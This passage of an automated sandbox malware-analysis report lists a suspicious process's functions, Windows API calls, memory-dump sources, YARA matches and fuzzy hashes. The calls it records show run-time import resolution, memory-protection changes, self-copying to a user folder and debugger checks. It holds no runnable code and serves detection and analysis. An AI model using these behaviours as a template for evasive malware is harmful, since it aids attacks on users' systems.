                                                                                                                                                                                          • Instruction Fuzzy Hash: A341B2B1905628DFEB24CF99D889BEEB7B5BB44304F20859AD409A7240D778AEC1CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406009, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$_write_string$__aulldiv__aullrem__mbtowc_l_get_int_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 830925916-2366072709
                                                                                                                                                                                          • Opcode ID: f4af19855defb4e8757c9dee4cc8f78e5cd9b80091bff6f9ff7b7f1be35c6121
                                                                                                                                                                                          • Instruction ID: 666b9c603c242c8d3fdac598ba9bfaf6b48c2fc0eb3efceb7bcde3098d1ea408
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4af19855defb4e8757c9dee4cc8f78e5cd9b80091bff6f9ff7b7f1be35c6121
                                                                                                                                                                                          • Instruction Fuzzy Hash: F54114B0E405299FDB24CF58C981B9EB7B5BF85314F0081AAE24AA7241C7345E918F59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417D18, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __getptd.LIBCMTD ref: 00417D2D
                                                                                                                                                                                            • Part of subcall function 004097C0: __getptd_noexit.LIBCMTD ref: 004097C6
                                                                                                                                                                                          • __getptd.LIBCMTD ref: 00417D3B
                                                                                                                                                                                          • ___DestructExceptionObject.LIBCMTD ref: 00417DA8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __getptd$DestructExceptionObject__getptd_noexit
                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                          • API String ID: 4290476786-1018135373
                                                                                                                                                                                          • Opcode ID: e3c7c263da429b8e79a76c9b9e45ff382efde3c3abb58278cf50ca065713820e
                                                                                                                                                                                          • Instruction ID: c5ae066ec79feb25a95b830f48a347be30d413994d22970f6ff8f0c253586eec
                                                                                                                                                                                          • Opcode Fuzzy Hash: e3c7c263da429b8e79a76c9b9e45ff382efde3c3abb58278cf50ca065713820e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11E675900208EBCF14DF65E4449EA7776AF54305F54806AE8095B342DB39DEC1CBE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004198E5, Relevance: 6.1, APIs: 4, Instructions: 68fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CopyFileExW.KERNEL32(00421D80,00421D50,00000000,00000000,00000000,00000000,?,?), ref: 00419947
                                                                                                                                                                                          • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041994F
                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 00419970
                                                                                                                                                                                          • GetStdHandle.KERNEL32(00000000), ref: 004199AD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AliasesConsoleCopyFindHandleLengthNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3298809309-0
                                                                                                                                                                                          • Opcode ID: ba3f90b7e07babbde7474793b10c1701f4891bdeaec7ef1c4b53b68aae505f26
                                                                                                                                                                                          • Instruction ID: dd6d673cba380057cd47230387bf578ec1fc145cf7a011dd64b80df19d897493
                                                                                                                                                                                          • Opcode Fuzzy Hash: ba3f90b7e07babbde7474793b10c1701f4891bdeaec7ef1c4b53b68aae505f26
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021F5B4E00218EBDB14CF95CC55BEEBBB5FB48301F1081AAE519A7390D7746A84CF89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004198F0, Relevance: 6.1, APIs: 4, Instructions: 61fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CopyFileExW.KERNEL32(00421D80,00421D50,00000000,00000000,00000000,00000000,?,?), ref: 00419947
                                                                                                                                                                                          • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041994F
                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 00419970
                                                                                                                                                                                          • GetStdHandle.KERNEL32(00000000), ref: 004199AD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AliasesConsoleCopyFindHandleLengthNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3298809309-0
                                                                                                                                                                                          • Opcode ID: b7b150a1ff63d6d4aebb04a60a102bb373cb812755b12ff2cf7f8e49ef26d6d3
                                                                                                                                                                                          • Instruction ID: b61365670aa742c41b5a739128c8f99abb57d842f36a5c524496bbebd42e7819
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7b150a1ff63d6d4aebb04a60a102bb373cb812755b12ff2cf7f8e49ef26d6d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621F8B4E00218EBDB14CF95DC55BEEBBB5FB48301F1081AAE519A7390D7746A84CF89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Analysis Process: sihost.exe PID: 5784 Parent PID: 936 sihost.exeCOMMON

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00419BE0, Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 273threadfiletimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(02B77408), ref: 00419C04
                                                                                                                                                                                          • _memset.LIBCMT ref: 00419C31
                                                                                                                                                                                            • Part of subcall function 00419350: GetModuleHandleA.KERNEL32(00421E1C), ref: 0041937E
                                                                                                                                                                                            • Part of subcall function 00419350: GetProcAddress.KERNEL32(02B77404,00435578), ref: 00419430
                                                                                                                                                                                            • Part of subcall function 00419350: VirtualProtect.KERNELBASE(02B6F54C,02B77B00,00000040,?), ref: 00419450
                                                                                                                                                                                            • Part of subcall function 004199E0: GetLastError.KERNEL32 ref: 00419A0C
                                                                                                                                                                                            • Part of subcall function 004199E0: GetPrivateProfileIntW.KERNEL32(00421E80,00421E70,00000000,00421E30), ref: 00419A2C
                                                                                                                                                                                            • Part of subcall function 004199E0: GetLastError.KERNEL32 ref: 00419A32
                                                                                                                                                                                            • Part of subcall function 004199E0: GetNumberFormatA.KERNEL32(00000000,00000000,00421E90,00000000,?,00000000), ref: 00419A58
                                                                                                                                                                                            • Part of subcall function 004199E0: GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00419A69
                                                                                                                                                                                            • Part of subcall function 004199E0: GetCommandLineW.KERNEL32 ref: 00419A6F
                                                                                                                                                                                            • Part of subcall function 004199E0: GetStartupInfoA.KERNEL32(00000000), ref: 00419A77
                                                                                                                                                                                            • Part of subcall function 004199E0: SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00419A81
                                                                                                                                                                                            • Part of subcall function 004199E0: CreateNamedPipeA.KERNEL32(00421EB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419AF1
                                                                                                                                                                                            • Part of subcall function 004199E0: GetBinaryType.KERNEL32(00421ED0,?), ref: 00419B49
                                                                                                                                                                                            • Part of subcall function 004199E0: HeapDestroy.KERNEL32(00000000), ref: 00419B51
                                                                                                                                                                                          • GetCommState.KERNEL32(00000000,?), ref: 00419CFA
                                                                                                                                                                                          • CreateIoCompletionPort.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419D08
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419D43
                                                                                                                                                                                          • GetProfileStringW.KERNEL32(00421FA8,00421F78,00421F68,?,00000000), ref: 00419D6A
                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 00419DD1
                                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 00419DF7
                                                                                                                                                                                          • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00419E07
                                                                                                                                                                                          • SetThreadLocale.KERNEL32(00000000), ref: 00419E4C
                                                                                                                                                                                          • HeapWalk.KERNEL32(00000000,00000000), ref: 00419E56
                                                                                                                                                                                          • WriteProfileStringW.KERNEL32(00422040,00422030,00421FF4), ref: 00419E6B
                                                                                                                                                                                          • SetThreadIdealProcessor.KERNEL32(00000000,00000000), ref: 00419E75
                                                                                                                                                                                          • EnumResourceLanguagesW.KERNEL32(00000000,00422120,00422078,00000000,00000000), ref: 00419EC0
                                                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419EC8
                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 00419ED7
                                                                                                                                                                                          • CreateSemaphoreA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419F09
                                                                                                                                                                                          • GetConsoleAliasExesLengthW.KERNEL32 ref: 00419F0F
                                                                                                                                                                                          • GetSystemTime.KERNEL32(00000000), ref: 00419F17
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419F5F
                                                                                                                                                                                          • UnregisterWaitEx.KERNEL32(00000000,00000000), ref: 00419F7E
                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00419F8B
                                                                                                                                                                                          • FindResourceExA.KERNEL32(00000000,004221C0,00422194,00000000), ref: 00419F9F
                                                                                                                                                                                          • FindAtomW.KERNEL32(004221F0), ref: 00419FDF
                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000000,00000000), ref: 00419FE9
                                                                                                                                                                                          • OpenMutexA.KERNEL32(00000000,00000000,00422248), ref: 00419FF8
                                                                                                                                                                                          • CopyFileExW.KERNEL32(00422294,00422258,00000000,00000000,00000000,00000000), ref: 0041A057
                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(004222FC,004222E0,004222C8,004222C0), ref: 0041A071
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Profile$Create$ErrorFindLastPrivateStringThreadTime$HeapInfoResourceWrite$AddressAliasAtomBinaryCommCommandCompletionConsoleContextCopyDecrementDestroyEnumEnvironmentExesFormatFreeHandleIdealInterlockedLanguagesLengthLineLocalLocaleModuleMutexNameNamedNextNumberOpenPipePortProcProcessorProtectSemaphoreShortStartupStateStringsSystemTypeUnlockUnregisterVirtualWaitWalk_memsetlstrlen
                                                                                                                                                                                          • String ID: ";$$.$&Pc$Pc$ficizulagavigajenum
                                                                                                                                                                                          • API String ID: 3387768851-811891720
                                                                                                                                                                                          • Opcode ID: 8e24c779774c676a34fd6a690cea4a60bf48acd946fd07b48fd3186c041d7cdf
                                                                                                                                                                                          • Instruction ID: f31b9a8bc7d1aa8fd04b4e2830f0ca4a4d395b920a6dc1273bc76c120149c905
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e24c779774c676a34fd6a690cea4a60bf48acd946fd07b48fd3186c041d7cdf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1B17334A84314EBDB249F60ED56BE977B0FB04705F1084AAE209662C0C7B81EC5DF9E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C6003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C6024D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                          • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                                                                          • Instruction ID: 751fb6d7ad82fa6ada8a52c97ba949136f1f036daebde48c75e9f8c067353c80
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32525974A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA85DF15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00419350, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00421E1C), ref: 0041937E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(02B77404,00435578), ref: 00419430
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(02B6F54C,02B77B00,00000040,?), ref: 00419450
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 2099061454-2766056989
                                                                                                                                                                                          • Opcode ID: 2ad12357a522cef60bd112afa0d5295fed7f52de05462541a459c876ddfa2d6e
                                                                                                                                                                                          • Instruction ID: d9ae2ebe879e639c4e3b926cec9c7d8b58d644c20bdcb63d04e190339fc0cd6f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ad12357a522cef60bd112afa0d5295fed7f52de05462541a459c876ddfa2d6e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32216D21908AC0FED302CB7CFD5862A3FA74326244F0866B9D495472BFC6792118DB7E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C60DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02C60223,?,?), ref: 02C60E02
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02C60223,?,?), ref: 02C60E07
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                          • Instruction ID: c24a7c79a3cdb0739b6b7fca210df49940037ef47a0b32523d1896d70317d918
                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2D0123114512C77D7002AD4DC0DBDD7B1C9F05B6AF008051FB0DE9181C7709A4046E5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409300, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 00409307
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                                          • Opcode ID: 290b8e1962c91982bf8375fc283ed684609ad00eaa07a203bd0aa917c7852488
                                                                                                                                                                                          • Instruction ID: 555c3cc75909235c463f038e69d95b8845f3c7525ef100fa5f3fbbce69837220
                                                                                                                                                                                          • Opcode Fuzzy Hash: 290b8e1962c91982bf8375fc283ed684609ad00eaa07a203bd0aa917c7852488
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BA01132088388A3C2002282A80AB823E0CC3C8A32F000020F22C020808AA2A80080AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00419330, Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000000,02B77B00), ref: 0041933B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                          • Opcode ID: 1aab901deb91e4522476e3ed4ad7919861da94ef2ec11d9425b62cd5ec64c2eb
                                                                                                                                                                                          • Instruction ID: 8e3655ca648fa178d482b9bc68af4478a5255a32ede4fed7c8bcd03305e8ef34
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aab901deb91e4522476e3ed4ad7919861da94ef2ec11d9425b62cd5ec64c2eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCC04C759953085FD2109B95B859B2177ACE348641F004415E50983651D66068148E55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02C614C2, Relevance: 13.6, APIs: 9, Instructions: 58fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02C614DB
                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C614ED
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,0040391C), ref: 02C61503
                                                                                                                                                                                          • PathIsDirectoryW.SHLWAPI(?), ref: 02C61510
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 02C61522
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,00403944), ref: 02C61534
                                                                                                                                                                                          • StrStrW.SHLWAPI(?,?), ref: 02C61548
                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 02C6156F
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02C61582
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$AppendDirectoryFile$CopyCreateExitFolderModuleNameProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3994694214-0
                                                                                                                                                                                          • Opcode ID: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
                                                                                                                                                                                          • Instruction ID: 3de5a8549df4787d0cf27699b133264310d9f886743f6be2798c4c73239cdb56
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A110DB2500229ABCB60DFA0DD4CEDB7B6CAB45316F0401A1A36AF2061EB7497C49F64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040BF70, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0041431D
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00414334
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00420BEC), ref: 0041433F
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0041435D
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00414364
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                          • Opcode ID: b5ed279ea4a4dab34c54404148aadcebec64625d945cb77831002f59ee24622b
                                                                                                                                                                                          • Instruction ID: 3b85324b25fa6e122bcd8d2fd14b9e1c915bf2a8df4e9c43ea8155ef528145f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ed279ea4a4dab34c54404148aadcebec64625d945cb77831002f59ee24622b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 902124B8910B089BD300EF65FC486897BB4FB58390F81607AEC1987361E3B40681CF8D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61250, Relevance: 52.7, APIs: 35, Instructions: 159libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(004036C8), ref: 02C6125B
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(0040370C), ref: 02C61291
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00403720), ref: 02C6129F
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00403738), ref: 02C612AC
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(0040374C), ref: 02C612B9
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00403738), ref: 02C612C7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00403788), ref: 02C612F2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040379C), ref: 02C61303
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037A8), ref: 02C61314
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037B4), ref: 02C61325
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037C0), ref: 02C61336
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037D0), ref: 02C61347
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037DC), ref: 02C61358
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037E8), ref: 02C61369
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037F4), ref: 02C6137D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004037FC), ref: 02C6138E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00403804), ref: 02C6139F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00403810), ref: 02C613AB
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040381C), ref: 02C613B7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00403830), ref: 02C613C8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00403840), ref: 02C613D7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040384C), ref: 02C613E3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040385C), ref: 02C613EF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040386C), ref: 02C61400
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,0040387C), ref: 02C61411
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00403890), ref: 02C6141D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040389C), ref: 02C61431
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038AC), ref: 02C61440
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038B4), ref: 02C61451
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038BC), ref: 02C6145D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038C4), ref: 02C6146E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038D4), ref: 02C6147F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038E8), ref: 02C61490
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,004038F8), ref: 02C614A1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,0040390C), ref: 02C614B2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2238633743-0
                                                                                                                                                                                          • Opcode ID: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
                                                                                                                                                                                          • Instruction ID: 810410d84f07510b68d2279596a66a4244035fbafc9fc8d3546152a8dc498d68
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9451A9F2951310BBC7007FB5AE4DA8A7EFCAA8974771184B7B305F31A1D6B892448B5C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410B73, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 368COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                                                                                                                                                                          • String ID: -$9
                                                                                                                                                                                          • API String ID: 3451365851-1631151375
                                                                                                                                                                                          • Opcode ID: 1a9a09d93578db34f9c0d612a98667e564935c5bb814d1e3d5b61f6c27d3800b
                                                                                                                                                                                          • Instruction ID: 653ea854a318213682fef8ef0d7c2510b134a99a2165e43a47bb046c5770e462
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a9a09d93578db34f9c0d612a98667e564935c5bb814d1e3d5b61f6c27d3800b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F138B1D052298FDB24CF58CC89BEEB7B1BB48304F10819AE409A7291D7789EC0CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407235, Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 365COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3455034128-2366072709
                                                                                                                                                                                          • Opcode ID: 4fcff20f53753deb092c499b28c604d23a3b997073a29a194913335518047743
                                                                                                                                                                                          • Instruction ID: 44260cf9f1c9588520b15a15453b67d017e9ba5cfde90ac40a21584d8801aa82
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fcff20f53753deb092c499b28c604d23a3b997073a29a194913335518047743
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6F15FF1D042199FDB24CF54CC85BAEB7B5BB45304F1484AAE609B7281D738AE84CF5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

